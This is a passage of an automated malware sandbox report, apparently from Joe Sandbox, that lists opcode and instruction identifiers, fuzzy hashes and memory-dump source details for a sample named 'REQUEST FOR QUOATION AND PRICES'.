                                                                                                                                • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e17184e1391c577321e10f2960bd4780bf07146f97fbeee95a3a84246b4421d4
                                                                                                                                • Instruction ID: e415bf2205c536f2ff55ba681201b1d0d45a69e67d5ae99c84b672f3c8f28acb
                                                                                                                                • Opcode Fuzzy Hash: e17184e1391c577321e10f2960bd4780bf07146f97fbeee95a3a84246b4421d4
                                                                                                                                • Instruction Fuzzy Hash: 11527974E01228CFEB65DF65C884BDDBBB2BB89301F1081EAD409AB255DB359E81CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 15e3ca0deef9febb133374b6d5ec3b1f4144e35b3dcb716c649d0c3ce7cdde3f
                                                                                                                                • Instruction ID: f0a80b5f90703001b0633a4e17784188a9b93ba317c7e6e2e2a4b4e2ea912d7d
                                                                                                                                • Opcode Fuzzy Hash: 15e3ca0deef9febb133374b6d5ec3b1f4144e35b3dcb716c649d0c3ce7cdde3f
                                                                                                                                • Instruction Fuzzy Hash: 8CC1AE74E00218CFEB24DFA5C994B9DBBB2BF89304F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a53c9ea4078e50dc623a216eae84b59248797e4733cfbb2418ce785bbbbb853
                                                                                                                                • Instruction ID: 6de181f65082d57bacafc1b39ffac09da076a6cbfc54ad96993b957902589e32
                                                                                                                                • Opcode Fuzzy Hash: 4a53c9ea4078e50dc623a216eae84b59248797e4733cfbb2418ce785bbbbb853
                                                                                                                                • Instruction Fuzzy Hash: B3C19174E00218CFDB14DFA5C954B9DBBB2BF89300F2481A9D409AB355DB359E86DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1d1bf563826e7b602223a5d86fb1967354d728efbb69011e0b36cb6e6e55ab07
                                                                                                                                • Instruction ID: ab8a2c9ddb96e7b4de1590a54d904d2beaf266fa9be5937e8350feca451e1bb9
                                                                                                                                • Opcode Fuzzy Hash: 1d1bf563826e7b602223a5d86fb1967354d728efbb69011e0b36cb6e6e55ab07
                                                                                                                                • Instruction Fuzzy Hash: 1AC1AE74E01218CFEB24DFA5C894B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 60710cf92b8e3ea575fdcf44be42729a8a88f9cbcb2700e8227ee932782cddae
                                                                                                                                • Instruction ID: 2dd548e5a5254b874c32d92c9b2096eb95c5ab930357459054bba465513dd817
                                                                                                                                • Opcode Fuzzy Hash: 60710cf92b8e3ea575fdcf44be42729a8a88f9cbcb2700e8227ee932782cddae
                                                                                                                                • Instruction Fuzzy Hash: 91C1A0B4E00218CFDB24DFA5C954B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 19a65a69c6566cc023ea59f345e191745b60a6272746c2b789bc51460987b9a7
                                                                                                                                • Instruction ID: c3294604d1bb92447512b71f6f236f34288ccbba891f08651002f56b5b1a6cd0
                                                                                                                                • Opcode Fuzzy Hash: 19a65a69c6566cc023ea59f345e191745b60a6272746c2b789bc51460987b9a7
                                                                                                                                • Instruction Fuzzy Hash: 27C19074E00218CFDB14DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 33b9bf91d7db454c4e57a710fcc537c1f1fe005bfbfef743c0ccc2cf4d26099f
                                                                                                                                • Instruction ID: ac433e94da72b83c152676f3d30a678214800d0c1925f5c31e63503264c2ae3e
                                                                                                                                • Opcode Fuzzy Hash: 33b9bf91d7db454c4e57a710fcc537c1f1fe005bfbfef743c0ccc2cf4d26099f
                                                                                                                                • Instruction Fuzzy Hash: CDC1B074E00218CFEB24DFA5C984B9DBBB2BF89300F2481A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6e7bab9fff2acaacd1875d8b4e7b7407c7ee6ce63426ca2397d0d44ae72fac34
                                                                                                                                • Instruction ID: c7fdcc62acfcf90aa96703fdb3dfa0be7be2e45bb58ac2046e88b7e395c61e14
                                                                                                                                • Opcode Fuzzy Hash: 6e7bab9fff2acaacd1875d8b4e7b7407c7ee6ce63426ca2397d0d44ae72fac34
                                                                                                                                • Instruction Fuzzy Hash: 9FC1A074E00258CFEB24DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27191135e8ed11de581ab491c3bf9bf39f40f7aec0f68ea3dd96f9ff5af1dcc3
                                                                                                                                • Instruction ID: 01ef9f15f580d0cb5408ca7028d518c951695bfbc66bd8096c085e5d1bdcfb8a
                                                                                                                                • Opcode Fuzzy Hash: 27191135e8ed11de581ab491c3bf9bf39f40f7aec0f68ea3dd96f9ff5af1dcc3
                                                                                                                                • Instruction Fuzzy Hash: 99C1AF74E01218CFEB24DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2c394a8b7e8403dc7bb4493457b712700d72f5bc2af04fe91e3daae4f25bb085
                                                                                                                                • Instruction ID: 949013451980bbd6f8cfed67de91440e52af2a4fbf46a846ece48c0f62bbabeb
                                                                                                                                • Opcode Fuzzy Hash: 2c394a8b7e8403dc7bb4493457b712700d72f5bc2af04fe91e3daae4f25bb085
                                                                                                                                • Instruction Fuzzy Hash: 18C19F74E00218CFEB24DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8c851cf699f4be7ec1e070e8b8de2d028c2528a569fe3a74d3ea8783620d2716
                                                                                                                                • Instruction ID: 00af530f6e5bd987cf45ec5ecbf8b3c1fd7b197f88c94a4560adab8ec7444f1d
                                                                                                                                • Opcode Fuzzy Hash: 8c851cf699f4be7ec1e070e8b8de2d028c2528a569fe3a74d3ea8783620d2716
                                                                                                                                • Instruction Fuzzy Hash: 19C1A074E00218CFDB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a0c3846cbec1ee318491e6e7deff2489054939a316627b514a9f25f3c211f4de
                                                                                                                                • Instruction ID: 3a0d27bad8eb38a8b5b769e7f9b1963044068cb8c85cb67e113c70b6744fae67
                                                                                                                                • Opcode Fuzzy Hash: a0c3846cbec1ee318491e6e7deff2489054939a316627b514a9f25f3c211f4de
                                                                                                                                • Instruction Fuzzy Hash: 6BC1A074E00218CFEB24DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: af859a757498ac8e912165719241ab01080cbbb740eb9a76b24ee3bc17e38412
                                                                                                                                • Instruction ID: fd19eaca10a5a50944f67668f398fb527aba2c4f0391cffd7563544237d651f4
                                                                                                                                • Opcode Fuzzy Hash: af859a757498ac8e912165719241ab01080cbbb740eb9a76b24ee3bc17e38412
                                                                                                                                • Instruction Fuzzy Hash: 85C1AF74E00218CFEB24DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dfe598b0d0a43702819cd9c4842034c8ce974bfb3125a7063d125fb0226cc3dd
                                                                                                                                • Instruction ID: dfb8755375826570a9149bf6a1e3fed1b15412e2a4b63d0b40755cce7b2a4297
                                                                                                                                • Opcode Fuzzy Hash: dfe598b0d0a43702819cd9c4842034c8ce974bfb3125a7063d125fb0226cc3dd
                                                                                                                                • Instruction Fuzzy Hash: A7C1AF74E00218CFEB24DFA5D980B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 194f7382d99494a29e43e04d06da1913007cb4ff35a537c13180e0b93512d83e
                                                                                                                                • Instruction ID: fa0194b31921c455f0e17882f296e5a1be5b06073b723ceb1a54855e0df60d70
                                                                                                                                • Opcode Fuzzy Hash: 194f7382d99494a29e43e04d06da1913007cb4ff35a537c13180e0b93512d83e
                                                                                                                                • Instruction Fuzzy Hash: CEC1A174E00218CFDB24DFA5C994B9DBBB2BF89304F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d44afdccd5f165fe489c58e89e9d080018a54ff33cfc39b3c69e562765d0b7cb
                                                                                                                                • Instruction ID: 354b8823928ef2305a3dfc74fd0d7e5b390d6a7b28c9bdbafc07f348c42457b4
                                                                                                                                • Opcode Fuzzy Hash: d44afdccd5f165fe489c58e89e9d080018a54ff33cfc39b3c69e562765d0b7cb
                                                                                                                                • Instruction Fuzzy Hash: DDC1A074E00218CFEB24DFA5C994B9DBBB2BF89304F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a4e7ec8bea73d590f05db3a33bea8a008b9b95d9b011d8bacbca13c75a40c868
                                                                                                                                • Instruction ID: c197a3852622c5b7369b2db108cd91fc644e67c72da34f916d2a20591cf962a9
                                                                                                                                • Opcode Fuzzy Hash: a4e7ec8bea73d590f05db3a33bea8a008b9b95d9b011d8bacbca13c75a40c868
                                                                                                                                • Instruction Fuzzy Hash: 01C1B0B4E00218CFEB14DFA5C990B9DBBB2BF89304F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ee45f7cbefe559c881340472019bd5ef6a5f81dfad5aed1b2ca6c8d3bfb2a5d4
                                                                                                                                • Instruction ID: 19aaf1759d34457a8978886ea23d749efccd8b2418c1430c76fbc8bbf8cee413
                                                                                                                                • Opcode Fuzzy Hash: ee45f7cbefe559c881340472019bd5ef6a5f81dfad5aed1b2ca6c8d3bfb2a5d4
                                                                                                                                • Instruction Fuzzy Hash: 91C1A074E00218CFEB24DFA5C994B9DBBB2BF89304F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 975f852ee9adcba9ba6a28d05e9bb6c8c83fff8d0bee5a78ce0b899e05e5aed1
                                                                                                                                • Instruction ID: 19b3b38890252558de4947ddee0596e7ede8a84319aa48385b3f107419d50a72
                                                                                                                                • Opcode Fuzzy Hash: 975f852ee9adcba9ba6a28d05e9bb6c8c83fff8d0bee5a78ce0b899e05e5aed1
                                                                                                                                • Instruction Fuzzy Hash: 60C1BF74E11218CFEB24DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E81DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8f81c8770f687351835da9fea8f7c4bd20d0dec1e582decbeef4c424b76d67a1
                                                                                                                                • Instruction ID: 70b4c2960717b81e65ee21bdf1612297303a9d2e4b07dbed7137bda8237fe7f7
                                                                                                                                • Opcode Fuzzy Hash: 8f81c8770f687351835da9fea8f7c4bd20d0dec1e582decbeef4c424b76d67a1
                                                                                                                                • Instruction Fuzzy Hash: 1FC1AF74E00218CFEB24DFA5D994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a8c98d13795aaa652665ce2181480e4fcfbb4bfe7b2a3838d85292b0ef239eab
                                                                                                                                • Instruction ID: 64415f53d8d8b5f128e6bc073c2beaebbad5b0390092945f1206eca3cf1c5ce3
                                                                                                                                • Opcode Fuzzy Hash: a8c98d13795aaa652665ce2181480e4fcfbb4bfe7b2a3838d85292b0ef239eab
                                                                                                                                • Instruction Fuzzy Hash: 7CC1B174E00218CFEB24DFA5C984B9DBBB2BF89304F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dd04efc2bc2504f18437a2578f8177336500cbe5e5fc1ca7e31d2dd0ecf87e7a
                                                                                                                                • Instruction ID: 21b5853b97c9a005954f9ad652f98d0b3dd4c14cea88c14ef855a1785d9fac90
                                                                                                                                • Opcode Fuzzy Hash: dd04efc2bc2504f18437a2578f8177336500cbe5e5fc1ca7e31d2dd0ecf87e7a
                                                                                                                                • Instruction Fuzzy Hash: 19C1B074E10218CFEB24DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 571c3196815ed1c81ef3d9e8ce8b2d754b8095a0273efbb8568fff465d9c2b70
                                                                                                                                • Instruction ID: ddc8831449e4b4d45c62f949cc385283c6e9eb777ce732b72d6531727b2c8e63
                                                                                                                                • Opcode Fuzzy Hash: 571c3196815ed1c81ef3d9e8ce8b2d754b8095a0273efbb8568fff465d9c2b70
                                                                                                                                • Instruction Fuzzy Hash: 11C1A074E00218CFEB24DFA5D990B9DBBB2BF89300F2081A9D409AB355DB359E81DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 649395033484e42da1a480b09da725298b6a44eb9a7fe26bfb99f507c5de5a13
                                                                                                                                • Instruction ID: 85935b896441d46c83c99410e0dcc7e5dedc5b8a9b1c493cf16a4059836be420
                                                                                                                                • Opcode Fuzzy Hash: 649395033484e42da1a480b09da725298b6a44eb9a7fe26bfb99f507c5de5a13
                                                                                                                                • Instruction Fuzzy Hash: CBC1AF74E00218CFEB24DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b3da6c5cb9afb5199e2503a02049bccb384a87e2f6eb51f591405dd9b7ec741d
                                                                                                                                • Instruction ID: 9fe2a7485bf52d7087630d2986e39cc509b9be290cea43a68baca1949d68cf3d
                                                                                                                                • Opcode Fuzzy Hash: b3da6c5cb9afb5199e2503a02049bccb384a87e2f6eb51f591405dd9b7ec741d
                                                                                                                                • Instruction Fuzzy Hash: 48C1B0B4E00218CFEB14DFA5C880B9DBBB2BF89300F2181A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c7dc02c75b14f03a47dc01cb1675a40a1611d423e37a94b2c6a4b7fa93b565ac
                                                                                                                                • Instruction ID: 509e154c27ea80acc5b43910bf756f3058c25a5e271c118b363959457003b2e2
                                                                                                                                • Opcode Fuzzy Hash: c7dc02c75b14f03a47dc01cb1675a40a1611d423e37a94b2c6a4b7fa93b565ac
                                                                                                                                • Instruction Fuzzy Hash: 1EC1A074E00218CFEB24DFA5D994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7305c1c99baf9431fde302ead2c8687950d8c43e178f45860fd9fa0cba2f082c
                                                                                                                                • Instruction ID: 06c03b0de394b52f25ed0ee5d56a80e8d556dfccaaf3e52125595b20d9561a6e
                                                                                                                                • Opcode Fuzzy Hash: 7305c1c99baf9431fde302ead2c8687950d8c43e178f45860fd9fa0cba2f082c
                                                                                                                                • Instruction Fuzzy Hash: 70C1A074E00218CFEB24DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5766800d1c69f265411e30b5182fbd0beffbfe25ed6393a3fc0d573963753fbb
                                                                                                                                • Instruction ID: 4a5d717faccbe05fc0206c4db49fc73596b94bc18d06c5269093d516dbcf8714
                                                                                                                                • Opcode Fuzzy Hash: 5766800d1c69f265411e30b5182fbd0beffbfe25ed6393a3fc0d573963753fbb
                                                                                                                                • Instruction Fuzzy Hash: 90C1B174E00218CFEB24DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2322245bfdcf72587353f41c29154fc1b9158d5c43b2e295b0ca197555ab52d5
                                                                                                                                • Instruction ID: 3da3aaee2153499c9894eaa9edf89a201bc6806abaa8f792ee05a9d2bcf0776b
                                                                                                                                • Opcode Fuzzy Hash: 2322245bfdcf72587353f41c29154fc1b9158d5c43b2e295b0ca197555ab52d5
                                                                                                                                • Instruction Fuzzy Hash: 8BC1A074E01218CFEB24DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9eb0c0609b15e8890662d3887f2334c04716a80ff658c8c35beaf6efb415cc02
                                                                                                                                • Instruction ID: 8e79a3fca5d3dcf7033b7f35cf4538f5de2d96338f2a2f43f16a829f027279be
                                                                                                                                • Opcode Fuzzy Hash: 9eb0c0609b15e8890662d3887f2334c04716a80ff658c8c35beaf6efb415cc02
                                                                                                                                • Instruction Fuzzy Hash: 7EC1B274E00218CFDB24DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
